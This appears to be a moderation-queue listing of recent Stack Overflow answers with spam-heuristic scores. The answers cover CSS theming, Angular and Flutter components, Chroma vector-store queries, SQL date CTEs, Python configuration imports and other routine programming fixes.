79358886

Date: 2025-01-15 15:56:25
Score: 4
Natty:
Report link

Rebuild your development build again

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Ogunmokun Israel Ademola

79358878

Date: 2025-01-15 15:53:24
Score: 2.5
Natty:
Report link

Why don't you just declare html.light and html.dark and use js just to switch this classes?

setTheme(theme){
    if (theme == "dark") {
        document.querySelector("html").classList.remove("light");
        document.querySelector("html").classList.add("dark");
    } else {       
        document.querySelector("html").classList.remove("dark");
        document.querySelector("html").classList.add("light");
    }
}
Reasons:
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Starts with a question (0.5): Why don't you
  • Low reputation (0.5):
Posted by: René Baudisch

79358876

Date: 2025-01-15 15:53:24
Score: 0.5
Natty:
Report link

Your proposed solution worked very well.

I added the following settings to my main.ts file:

import { bootstrapApplication } from "@angular/platform-browser";
import { AppComponent } from "./app/view/main/app.component";
import { importProvidersFrom } from "@angular/core";
import { ModalModule } from "ngx-bootstrap/modal";
import { provideRouter } from "@angular/router";
import { routes } from "./app/app.routes";

bootstrapApplication(AppComponent, {
  providers: [
    importProvidersFrom(ModalModule.forRoot()),
    provideRouter(routes)
  ],
})
.catch((err) => console.error(err));

With this, I was able to use my modals within standalone components just by adding them to the providers, as you can see in the code below:

listagem-posts.component.html

<!-- Botão para abrir o modal -->
<button type="button" class="btn btn-primary" (click)="openModal(template)">Abrir Modal</button>

<!-- Template do modal -->
<ng-template #template>
  <div class="modal-header">
    <h4 class="modal-title">Título do Modal</h4>
    <button type="button" class="btn-close" (click)="modalRef?.hide()" aria-label="Close"></button>
  </div>
  <div class="modal-body">
    Este é um modal com NGX-Bootstrap.
  </div>
  <div class="modal-footer">
    <button type="button" class="btn btn-secondary" (click)="modalRef?.hide()">Fechar</button>
    <button type="button" class="btn btn-primary">Salvar mudanças</button>
  </div>
</ng-template>

listagem-posts.component.ts

import { Component, TemplateRef } from '@angular/core';
import  { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { BsModalService, BsModalRef } from 'ngx-bootstrap/modal';

@Component({
  selector: 'listagem-posts',
  standalone: true,
  providers: [NgbModal],
  templateUrl: './listagem-posts.component.html',
  styleUrl: './listagem-posts.component.css',
  imports: []
})
export class ListagemPostsComponent {

  constructor(private modalService: BsModalService
  ){}


  //------------------------------------------------------

  modalRef!: BsModalRef;

  openModal(template: TemplateRef<any>) {
     this.modalRef = this.modalService.show(template);
  }

  //------------------------------------------

  open(content: any) {
    // Lógica para abrir o modal
    console.log('teste');
  }

}

thanks again for the help! ^.^

Reasons:
  • Blacklisted phrase (0.5): thanks
  • Long answer (-1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Anderson Machado

79358849

Date: 2025-01-15 15:45:22
Score: 2
Natty:
Report link

If you're looking for the best clothing websites that offer both trendy styles and affordability, Clothora.com is a fantastic choice! Clothora combines quality with affordability, offering a wide range of fashionable pieces for every occasion. Whether you're shopping for casual wear, formal outfits, or something unique, Clothora delivers exceptional options at budget-friendly prices.

Reasons:
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Saniya Naaz

79358848

Date: 2025-01-15 15:45:21
Score: 4
Natty: 5
Report link

This should be fixed in the future releases, see: https://issuetracker.google.com/issues/356171302

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Michal Neubauer

79358846

Date: 2025-01-15 15:44:20
Score: 0.5
Natty:
Report link

Have a look at

https://github.com/volodymyrprokopyuk/go-wallet

A guided design and implementation of a BIP-32 HD wallet in Go with a convenient CLI for easy experimentation using Nushell.

A guided design and implementation of a HD wallet in Go with a convenient CLI for easy experimentation using Nushell (or any other shell). The wallet CLI exposes an easy to use and experiment CLI tools to generate BIP-39 mnemonics for a HD wallet, derive extended private and public keys for a BIP-32 HD wallet, encode and decode derived keys into different formats e.g. xprv, xpub. The wallet CLI also provides tools to generate secp256k1 key pairs, ESDSA sign transactions and verify signatures. The wallet CLI exposes tools to encode and decode data using the bsae58 and base58check encoding, as well as encode an Ethereum address using the ERC-55 address encoding.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Volodymyr Prokopyuk

79358837

Date: 2025-01-15 15:41:19
Score: 4
Natty:
Report link

should become available in shap==0.47

Reasons:
  • Low length (2):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: meeh

79358827

Date: 2025-01-15 15:39:17
Score: 1.5
Natty:
Report link

I can force the composer to use my current PHP version set by phpbrew by using an alias. For example in my config.fish:

alias composer="php $(which composer)"
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: natanhp

79358823

Date: 2025-01-15 15:38:17
Score: 2.5
Natty:
Report link

There is no way to by the api retrive only row fitting a criteria, you must first fetch all rows, and then manually filter them.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Etienne Mermillod

79358819

Date: 2025-01-15 15:36:17
Score: 1
Natty:
Report link

The issue was that there is a conflict in uv when using bind mounts. When removing the volumes from the docker-compose file, it worked. I also had to remove a python-version file from my directory. See https://github.com/astral-sh/uv/issues/10615 for more context.

Reasons:
  • Whitelisted phrase (-1): it worked
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: kamagitheboilerman

79358818

Date: 2025-01-15 15:36:17
Score: 2
Natty:
Report link

I got this exception only for one out of several similar view models in my kotlin project. After researching and debugging for several hours I found the very surprising reason. The (super)package was named "new", i.e ".app.new.viewmodel". This makes Hilt crash with a very obscure exception. Since "new" is valid name, I got no errors neither from the IDE nor from the compiler.

Reasons:
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Heiko Schmitz

79358811

Date: 2025-01-15 15:35:16
Score: 1
Natty:
Report link

import 'package:flutter/material.dart';

enum CustomTextFieldType {
  singleLineTextField,
  multiLineTextField,
  passwordField,
  searchField,
}

class CustomTextField extends StatelessWidget {
  final CustomTextFieldType type;
  final String? labelText;
  final TextEditingController? controller;
  final String? errorText;
  final IconData? prefixIcon;
  final IconData? suffixIcon;
  final bool obscureText;
  final Color? borderColor;
  final Color? labelColor;
  final Color? errorColor;
  final Color? textColor;
  final TextStyle? textStyle;
  final int? maxLines;
  final VoidCallback? onSuffixIconTap;
  final EdgeInsetsGeometry? padding;

  CustomTextField({
    required this.type,
    this.labelText,
    this.controller,
    this.errorText,
    this.prefixIcon,
    this.suffixIcon,
    this.obscureText = false,
    this.borderColor,
    this.labelColor,
    this.errorColor,
    this.textColor,
    this.textStyle,
    this.maxLines,
    this.onSuffixIconTap,
    this.padding,
  });

  @override
  Widget build(BuildContext context) {
    switch (type) {
      case CustomTextFieldType.singleLineTextField:
        return _buildSingleLineTextField(context);
      case CustomTextFieldType.multiLineTextField:
        return _buildMultiLineTextField(context);
      case CustomTextFieldType.passwordField:
        return _buildPasswordField(context);
      case CustomTextFieldType.searchField:
        return _buildSearchField(context);
      default:
        return _buildDefaultTextField(context);
    }
  }

  Widget _buildSingleLineTextField(BuildContext context) {
    return _buildTextField(context, maxLines: 1);
  }

  Widget _buildMultiLineTextField(BuildContext context) {
    return _buildTextField(context, maxLines: maxLines ?? 5);
  }

  Widget _buildPasswordField(BuildContext context) {
    return _buildTextField(context, obscureText: true);
  }

  Widget _buildSearchField(BuildContext context) {
    return _buildTextField(
      context,
      prefixIcon: prefixIcon ?? Icons.search,
      suffixIcon: suffixIcon,
      onSuffixIconTap: onSuffixIconTap,
    );
  }

  Widget _buildDefaultTextField(BuildContext context) {
    return _buildTextField(context);
  }

  Widget _buildTextField(
    BuildContext context, {
    int? maxLines,
    bool? obscureText,
    IconData? prefixIcon,
    IconData? suffixIcon,
    VoidCallback? onSuffixIconTap,
  }) {
    return Padding(
      padding: _getPadding(),
      child: TextField(
        controller: controller,
        obscureText: obscureText ?? this.obscureText,
        maxLines: maxLines ?? 1,
        style: _getTextStyle(),
        decoration: InputDecoration(
          labelText: labelText,
          labelStyle: TextStyle(color: _getLabelColor(context)),
          errorText: errorText,
          errorStyle: TextStyle(color: _getErrorColor(context)),
          prefixIcon: prefixIcon != null ? Icon(prefixIcon) : null,
          suffixIcon: suffixIcon != null
              ? GestureDetector(
                  onTap: onSuffixIconTap,
                  child: Icon(suffixIcon, color: _getErrorColor(context)),
                )
              : null,
          enabledBorder: _getBorder(context),
          focusedBorder: _getBorder(context),
          errorBorder: _getErrorBorder(context),
          focusedErrorBorder: _getErrorBorder(context),
        ),
      ),
    );
  }

  // Method to get the border with the specified color
  InputBorder _getBorder(BuildContext context) {
    return UnderlineInputBorder(
      borderSide: BorderSide(color: _getBorderColor(context)),
    );
  }

  // Method to get the error border with the specified color
  InputBorder _getErrorBorder(BuildContext context) {
    return UnderlineInputBorder(
      borderSide: BorderSide(color: _getErrorColor(context)),
    );
  }

  // Method to get the border color or a default value
  Color _getBorderColor(BuildContext context) {
    return borderColor ?? Theme.of(context).primaryColor;
  }

  // Method to get the label color or a default value
  Color _getLabelColor(BuildContext context) {
    return labelColor ?? Theme.of(context).primaryColor;
  }

  // Method to get the error color or a default value
  Color _getErrorColor(BuildContext context) {
    return errorColor ?? Colors.red;
  }

  // Method to get the text color or a default value
  Color _getTextColor(BuildContext context) {
    return textColor ?? Theme.of(context).primaryColor;
  }

  // Method to get the text style or a default style
  TextStyle _getTextStyle() {
    return textStyle ?? TextStyle(fontSize: 16, color: _getTextColor(context));
  }

  // Method to get the padding or a default value
  EdgeInsetsGeometry _getPadding() {
    return padding ?? EdgeInsets.all(8.0);
  }
}


class TextFieldExamples extends StatelessWidget {
  @override
  Widget build(BuildContext context) {
    return Scaffold(
      appBar: AppBar(title: Text('TextField Examples')),
      body: Padding(
        padding: const EdgeInsets.all(16.0),
        child: Column(
          crossAxisAlignment: CrossAxisAlignment.stretch,
          children: [
            CustomTextField(
              type: CustomTextFieldType.singleLineTextField,
              labelText: 'Single Line TextField',
              controller: TextEditingController(),
              borderColor: Colors.blue,
            ),
            SizedBox(height: 20),
            CustomTextField(
              type: CustomTextFieldType.multiLineTextField,
              labelText: 'Multi-line TextField',
              controller: TextEditingController(),
              maxLines: 4,
              borderColor: Colors.green,
            ),
            SizedBox(height: 20),
            CustomTextField(
              type: CustomTextFieldType.passwordField,
              labelText: 'Password Field',
              controller: TextEditingController(),
              borderColor: Colors.red,
              suffixIcon: Icons.visibility_off,
              onSuffixIconTap: () {
                print('Toggle Password Visibility');
              },
              obscureText: true,
            ),
            SizedBox(height: 20),
            CustomTextField(
              type: CustomTextFieldType.searchField,
              labelText: 'Search Field',
              controller: TextEditingController(),
              prefixIcon: Icons.search,
              suffixIcon: Icons.clear,
              onSuffixIconTap: () {
                print('Clear Search Field');
              },
              borderColor: Colors.orange,
            ),
          ],
        ),
      ),
    );
  }
}

Reasons:
  • RegEx Blacklisted phrase (1.5): fixIcon ??
  • Long answer (-1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: shradha Khaire

79358803

Date: 2025-01-15 15:33:15
Score: 5.5
Natty:
Report link

The problem was that I used old properties (management.metrics.export.influx.). Current version is management.influx.metrics.export.. So, if you have similar problem, you should use either current properties or older version of Spring (2.3.0 or less)

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Me too answer (2.5): have similar problem
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Михаил Воробьев

79358796

Date: 2025-01-15 15:30:15
Score: 1
Natty:
Report link

Disclaimer
I am assuming you are using the latest versions of the Python packages mentioned. At the time of writing, these are:

If this is not the case, please explicitly include the versions you are using so we can provide more accurate assistance.


To check if a document exists in the vector store based on its metadata, the .get() function is your best option.

Here’s a summary of how it works:

  1. Set the limit (k): This specifies the maximum number of results to retrieve.

  2. Use a where query: Utilize the Metadata Filtering feature provided by Chroma. As described in this documentation:

    "An optional where filter dictionary can be supplied to filter by the metadata associated with each document."

    Details on configuring the where filter are available here.

Once configured, you're all set. For example, the following snippet demonstrates the functionality:

existing_metadata = db.get(
    limit=1,
    where={"id": {"$eq": "ABC123"}}
)["metadatas"]

This code returns a list (limited to one element) containing the metadata of documents that match the where condition.

Below is a complete code example to illustrate how this works:

import os
from langchain_chroma import Chroma
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain_openai.embeddings import AzureOpenAIEmbeddings
from dotenv import load_dotenv, find_dotenv

# Load environment variables
load_dotenv(find_dotenv(".env"), override=True)

# Prepare embeddings and the vector store
embeddings = AzureOpenAIEmbeddings(
    api_key=os.environ.get("AZURE_OPENAI_EMBEDDINGS_API_KEY"),
    api_version=os.environ.get("AZURE_OPENAI_EMBEDDINGS_VERSION"),
    azure_deployment=os.environ.get("AZURE_OPENAI_EMBEDDINGS_MODEL"),
    azure_endpoint=os.environ.get("AZURE_OPENAI_EMBEDDINGS_ENDPOINT")
)
db = Chroma(
    persist_directory=os.environ.get("CHROMA_PATH"),
    embedding_function=embeddings,
    collection_name="stackoverflow-help",
)

# Add documents to the vector store
text_splitter = RecursiveCharacterTextSplitter(
    chunk_size=int(os.environ["CHROMA_EMBEDDINGS_CHUNK_SIZE"]),
    chunk_overlap=int(os.environ["CHROMA_EMBEDDINGS_CHUNK_OVERLAP"])
)

documents = text_splitter.create_documents(["This is a test document for the Chroma database."])
for doc in documents:
    doc.metadata = {"id": "ABC123"}
db.add_documents(documents)

# Check if the document is in the vector store
existing_metadata = db.get(
    limit=1,
    where={"id": {"$eq": "ABC123"}}
)["metadatas"]
print(existing_metadata)

# Check for a document that is not in the vector store
non_existing_metadata = db.get(
    limit=1,
    where={"id": {"$eq": "XYZ123"}}
)["metadatas"]
print(non_existing_metadata)

When you run this code, the results will be as follows:

[{'id': 'ABC123'}]  # Output of print(existing_metadata)
[]  # Output of print(non_existing_metadata)
Reasons:
  • Blacklisted phrase (1): this document
  • Blacklisted phrase (1): stackoverflow
  • Long answer (-1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: dvdr00t

79358794

Date: 2025-01-15 15:29:14
Score: 1
Natty:
Report link

Since I didn't see this variant in the other answers, this works in at least v5+

$dictionary = New-Object 'System.Collections.Generic.Dictionary[string,int]'

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: dzampino

79358788

Date: 2025-01-15 15:28:13
Score: 9 🚩
Natty: 4
Report link

I found many more articles from people saying their Alfresco is not indexing file contents when the file upload is made using the REST API. Only files uploaded using the Share interface will get content indexed. Is it true? Can't we have API uploaded files content indexed ever?

Has anyone found a solution?

Reasons:
  • Blacklisted phrase (2): anyone found
  • RegEx Blacklisted phrase (3): Has anyone found
  • Low length (0.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Sergio García Galán

79358784

Date: 2025-01-15 15:27:13
Score: 2.5
Natty:
Report link

The input of those fields is expected to be a JSON data structure or delimited text value that consists of the activity party ID values in GUID format. For more details on how to work with those fields, please refer to the documentation topic. In case that the ID might be different in the target system, you can leverage the Text Lookup feature. For CRM to CRM migration/integration, you can very much map the same field from the source to the destination.

Reasons:
  • Contains signature (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: KingswaySoft

79358777

Date: 2025-01-15 15:26:12
Score: 4
Natty:
Report link

The issue was solved by installing pandas packet

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: EGOR_MIPT

79358750

Date: 2025-01-15 15:19:10
Score: 1.5
Natty:
Report link

my problem was solved by importing RepositoryEnv

from pathlib import Path
from decouple import Config, RepositoryEnv

BASE_DIR = Path(__file__).resolve().parent.parent
config = Config(RepositoryEnv(".env"))
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Bohdan

79358738

Date: 2025-01-15 15:17:09
Score: 1
Natty:
Report link

This ended up working.
vnet_id

module.network.vnet_id[keys(var.vnets)[0]]

vnet_name

module.network.vnet_name[keys(var.vnets)[0]]
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: NickP

79358728

Date: 2025-01-15 15:14:08
Score: 1
Natty:
Report link
if not camera.isOpened():
 
   print("Error:") 

else: 

   print("Success.") 

   for i in range(10): 
     ret, frame = camera.read() 

     if ret: 
      print("Success") 

      break 

     else: 

       print("Fail") 

    if not ret: 

       print("Fail") 

    else: 

       cv2.imshow("Captured Frame", frame) 

       cv2.waitKey(0)```
Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: BSP

79358726

Date: 2025-01-15 15:14:07
Score: 4
Natty:
Report link

The only other answer here recommends using Flink Metrics reporter however that is for reporting Flinks internal metrics to Prometheus. You should use the Prometheus sink: https://nightlies.apache.org/flink/flink-docs-master/docs/connectors/datastream/prometheus/

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: MadhavK

79358724

Date: 2025-01-15 15:14:07
Score: 2.5
Natty:
Report link

Has the problem been solved?I had the same problem

Reasons:
  • Whitelisted phrase (-1): I had the same
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: user25266348

79358712

Date: 2025-01-15 15:11:06
Score: 5.5
Natty:
Report link

This looks similar to https://stackoverflow.com/a/62109869/26842213. Give that a try and see if it resolves your issue.

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: James Fredley

79358696

Date: 2025-01-15 15:07:05
Score: 1
Natty:
Report link

just to improve your graph

rund the script with

t = np.linspace(-np.pi/2, np.pi/2, 500)
v = -np.sin(t)

and with

t = np.linspace(-np.pi/2, np.pi/2, 500)
v = -np.sin(t)

and combine both plots

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Jaroel

79358685

Date: 2025-01-15 15:04:04
Score: 1
Natty:
Report link

I was able to solve this by attaching the sectPr of the last section to the document instead of a paragraph.

    SectPr sectPr = factory.createSectPr();
    SectPr.Type sectPrType = factory.createSectPrType();
    sectPrType.setVal("nextPage");

    sectPr.setType(sectPrType);

    wordprocessingMLPackage.getMainDocumentPart().getJaxbElement().getBody().setSectPr(sectPr);
Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Gopika Ravikumar

79358684

Date: 2025-01-15 15:02:04
Score: 0.5
Natty:
Report link

The one checked was so close to what I needed. Had to make a few changes. 1st I needed more than a month (6 years). Then I need to add the OPTION line at the bottom. This allowed me to join the sales date on this CTE.

declare @mindate datetime
declare @maxdate datetime
set @mindate = '2019-01-01' set @maxdate = '2022-06-17'
; WITH AllDateDOW AS (
        SELECT  DATEADD(day ,-(DAY(@mindate)-1),@mindate) as AllDATE, 
                DATENAME(dw, DATEADD(day, -(DAY(@mindate) - 1), @mindate)) as DOWDAY
        UNION ALL
        SELECT  DATEADD(day, 1, AllDATE),
                DATENAME(dw, DATEADD(dw, 1, AllDATE))
        FROM    AllDateDOW
        WHERE   DATEADD(day, 1, AllDATE) <= @maxdate
    )
    -- SELECT *     FROM AllDateDOW
OPTION (MAXRECURSION 2190) -- This needs to be after the Order By. 2190=6 Years --

Reasons:
  • Blacklisted phrase (0.5): I need
  • Long answer (-0.5):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Nathan Brick

79358672

Date: 2025-01-15 14:59:02
Score: 9 🚩
Natty: 5.5
Report link

did you find any way of getting count of reviews ?

Reasons:
  • RegEx Blacklisted phrase (3): did you find any
  • Low length (1.5):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Starts with a question (0.5): did you find any
  • Low reputation (1):
Posted by: sai kaushik motukuri

79358670

Date: 2025-01-15 14:59:02
Score: 3
Natty:
Report link

@Durable Developer it worked for me too! Thank you! Can you explain why this change works? Reading in React Native docs https://reactnative.dev/docs/pressable#onpress I can see that the sequence of press-ish events it's this one: enter image description here

So I supposed that since onPress was provoking the bug and onPressOut was working, even onPressIn would have worked so I tried, but surprisingly onPressIn didn't work and provoked the bug, so I don't understand why only onPressOut works

Reasons:
  • Blacklisted phrase (0.5): Thank you
  • Whitelisted phrase (-1): it worked
  • Whitelisted phrase (-1): worked for me
  • RegEx Blacklisted phrase (2.5): Can you explain
  • Has code block (-0.5):
  • Contains question mark (0.5):
  • User mentioned (1): @Durable
  • Low reputation (1):
Posted by: Federica Oltolina

79358669

Date: 2025-01-15 14:59:02
Score: 1
Natty:
Report link

I did encounter those known issues regarding the ordering of factors as mentioned by @mnel. I tried geom_path mentioned by @mnel and Matt Bannert, and it works beautifully!

for example, in df1, W, X, and Z are factors, Y is numerical. df1 is sorted by Z

ggplot(df1,aes(X,Y))+
  geom_path(alpha=0)+ # w/o this line, points are not plotted in their order in df1
  geom_jitter(aes(color=Z,fill=Z))+
  facet_wrap('W')
Reasons:
  • Has code block (-0.5):
  • User mentioned (1): @mnel
  • User mentioned (0): @mnel
  • Low reputation (0.5):
Posted by: blueskyddd

79358658

Date: 2025-01-15 14:54:01
Score: 1
Natty:
Report link

After throughly reviewing all involved settings, I was not being able to list labels using impersonation.

Turns out, Google has enabled an Api Explorer in the same Api reference webpage, so you can try the endpoint after a simple OAuth authentication.

After some trial and error, in my case the problem was I had to set

labels.list.useAdminAccess = true

Reasons:
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Antonio Miras

79358653

Date: 2025-01-15 14:53:01
Score: 1.5
Natty:
Report link

I didn't see this answer, but it seems easy enough. My token expired. After generating a new token on Gitlab, I tried to commit the code with VS Code. I received an error message the first time. The second time I received the popup below asking for user name (which is the token name) and password (which is the token). If you are using VS Code for the first time, you may have to try to clone a repo twice in order to get the popup below.

git_credential_manager_popup

Reasons:
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: Ted M.

79358631

Date: 2025-01-15 14:45:59
Score: 0.5
Natty:
Report link

Your import statement is wrong as you capitalized the c in config. Change from decouple import Config to:

from decouple import config

See https://simpleisbetterthancomplex.com/2015/11/26/package-of-the-week-python-decouple.html

Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • High reputation (-1):
Posted by: dev_light

79358628

Date: 2025-01-15 14:44:59
Score: 1
Natty:
Report link

I found a solution. It seems like route groups work really well for my situation.

It's good to know that homepage of your project can be put in group, and pages.tsx files of page-folder and page-folder/[id] can also be in different groups

app
-(main)  -> MainLayout
--stories    
--create   
--profile 
--page.tsx (Homepage)
-sign-up    -> No layout
-sign-in    -> No layout
-stories/[id] -> StoryLayout
Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Curry

79358625

Date: 2025-01-15 14:43:58
Score: 5
Natty: 5
Report link

I am currently working on a project using azure ad but i am facing some bugs, would you be kind enough to share your code so that i can copy a few things?

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • Low reputation (1):
Posted by: JayLingz

79358624

Date: 2025-01-15 14:43:58
Score: 0.5
Natty:
Report link

Think of it like having two small filing cabinets vs one large cabinet. Even with both perfectly organized, the smaller ones are faster because:

The tradeoff is maintaining multiple tables and the union view. But when you heavily filter on the sort key, the I/O and memory efficiency gains usually outweigh that overhead.

I've seen 2x performance improvements using this approach, especially with wide tables where queries only needed a subset of columns.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Samuel Arogbonlo

79358612

Date: 2025-01-15 14:39:57
Score: 2.5
Natty:
Report link

Speedof.me offers an speed test API: https://speedof.me/api

Reasons:
  • Probably link only (1):
  • Low length (2):
  • No code block (0.5):
  • High reputation (-1):
Posted by: advncd

79358610

Date: 2025-01-15 14:39:57
Score: 2
Natty:
Report link

The 2nd is not preferable. A CTE is not required in this scenario.

see When to use Common Table Expression (CTE)

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • High reputation (-1):
Posted by: Bart McEndree

79358606

Date: 2025-01-15 14:37:56
Score: 1
Natty:
Report link

If you want to add all the assets in a folder (say "images" folder), you should add "/" at the end as below in pubspec.yaml.

  assets:
    - assets/images/
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: MubarakZade

79358604

Date: 2025-01-15 14:36:56
Score: 3.5
Natty:
Report link

Clear Excluded Architectures: Runner>Runner>Architectures>Search: "Excluded Architectures"

Clear field "Multiple Values"

enter image description here

Good Coding! 😎💙

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Inaldo Manso

79358603

Date: 2025-01-15 14:36:56
Score: 3.5
Natty:
Report link

i had to run chown www-data:www-data on the folder im writing into, didn't work first time for some reason

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: B Z

79358597

Date: 2025-01-15 14:35:55
Score: 4.5
Natty:
Report link

Indeed has some Grails Framework related positions listed currently. https://www.indeed.com/jobs?q=Grails+engineer

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: James Fredley

79358596

Date: 2025-01-15 14:35:55
Score: 2
Natty:
Report link

It have to help you: https://reflex.dev/docs/datatable-tutorial/add-styling/

theme = {
...
 "bgHeader": "blue",
...
}

rx.data_editor(
   data=...
   theme=theme,
)
Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: Anatoliy Aksenov

79358584

Date: 2025-01-15 14:32:54
Score: 1.5
Natty:
Report link

I know this post is very old, but I can assure everyone that freeradius does NOT and will NOT work no matter how it's configured, I have tried for 3 months, and even a profession IT techie couldn't do it, as the setup instructions are not simplified.

EG what follows 'client' is it a name? IP address? Who knows, I've tried both, and it still throws an error, 'unable to resolve name to ip address'

What follows 'ipaddr'? is it the router/AP ip address or the server ip address? Who knows? I've tried both and the error log says something about an unknown client.

What other additions are there to place? Who knows? As the documentation is not simplified for stupid people like me.

There is NO example configuration files with comments on each line.

EG ipaddr is where you put the ip address of ...........

or a plain explanation of what to put after 'client', instead of just showing 'client network_device {' what network_device? printer, router, server, NAS? There's not enough simple explanations, and then people wonder why it doesn't work.

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Filler text (0.5): ...........
  • Low reputation (1):
Posted by: Micheal Saunders

79358580

Date: 2025-01-15 14:31:54
Score: 0.5
Natty:
Report link

Dremio LISTAGG is a more limited function than SQL STRING_AGG. I had to find a workaround.

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • High reputation (-2):
Posted by: jhowe

79358578

Date: 2025-01-15 14:30:49
Score: 7.5 🚩
Natty: 5
Report link

We are a software company with a popular image editing software and we have the same problems. It's really annoying because the antivirus doesn't give a lot of information about what's the threat exactly, so I was searching and found this open topic. Did you find more information about the cause of the detection ? our is : gen.variant.tedy.67xxxx ( it is not even displayed in full )

Reasons:
  • RegEx Blacklisted phrase (3): Did you find
  • No code block (0.5):
  • Me too answer (2.5): have the same problem
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: Angel Brace

79358577

Date: 2025-01-15 14:30:48
Score: 6 🚩
Natty: 6.5
Report link

I hope you get a solution for this. If yes can you please share with me, i am on same position i need to get the stoppedtask metric in CloudWatch to monitor the ecs task. thank you

Reasons:
  • Blacklisted phrase (0.5): thank you
  • Blacklisted phrase (0.5): i need
  • RegEx Blacklisted phrase (2.5): can you please share
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: ehsan ali

79358558

Date: 2025-01-15 14:25:46
Score: 2.5
Natty:
Report link

new ExpoTHREE.TextureLoader().load() is working for me

Reasons:
  • Low length (1.5):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Nico

79358557

Date: 2025-01-15 14:25:46
Score: 2.5
Natty:
Report link

Maybe you have another "View" Container around the WebView? Then it shows a Blank Page

For example change Code like:

<View>
    <WebView
    javaScriptEnabled={true}
    originWhitelist={['*']}
    source={{html: htmlContent}}
    />
</View>

To:

<WebView
javaScriptEnabled={true}
originWhitelist={['*']}
source={{html: htmlContent}}
/>

if that doesnt fix it, maybe you can show a part of your code?

Reasons:
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Low reputation (1):
Posted by: Kioshia

79358547

Date: 2025-01-15 14:22:45
Score: 1.5
Natty:
Report link
begin 
        apex_instance_admin.set_parameter(
            p_parameter => 'IMAGE_PREFIX',
            p_value     => 'https://static.oracle.com/cdn/apex/24.1.7/' );
        
        commit;
  end;

Used this and configured in Admin Services under Manage Instance

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: d313

79358543

Date: 2025-01-15 14:21:45
Score: 3.5
Natty:
Report link

For those who may have the same problem in the future, here is the solution with only CSS.

.c-login__wrapper {
  -webkit-box-pack: unset;
  -webkit-box-align: unset;
  align-items: center;
  display: flex;
  height: 100vh;
  justify-content: space-around;
}

.login-positioner {
  display: flex;
  flex-basis: 100%;
  justify-content: center;
  background-color: green;
}

.login {
  background-color: red;
  margin: 0;
  width: 200px;
}

.marketing-wrapper {
  align-items: center;
  background-color: aqua;
  height: 100%;
  display: flex;
  flex-basis: 100%;
  justify-content: center;
}

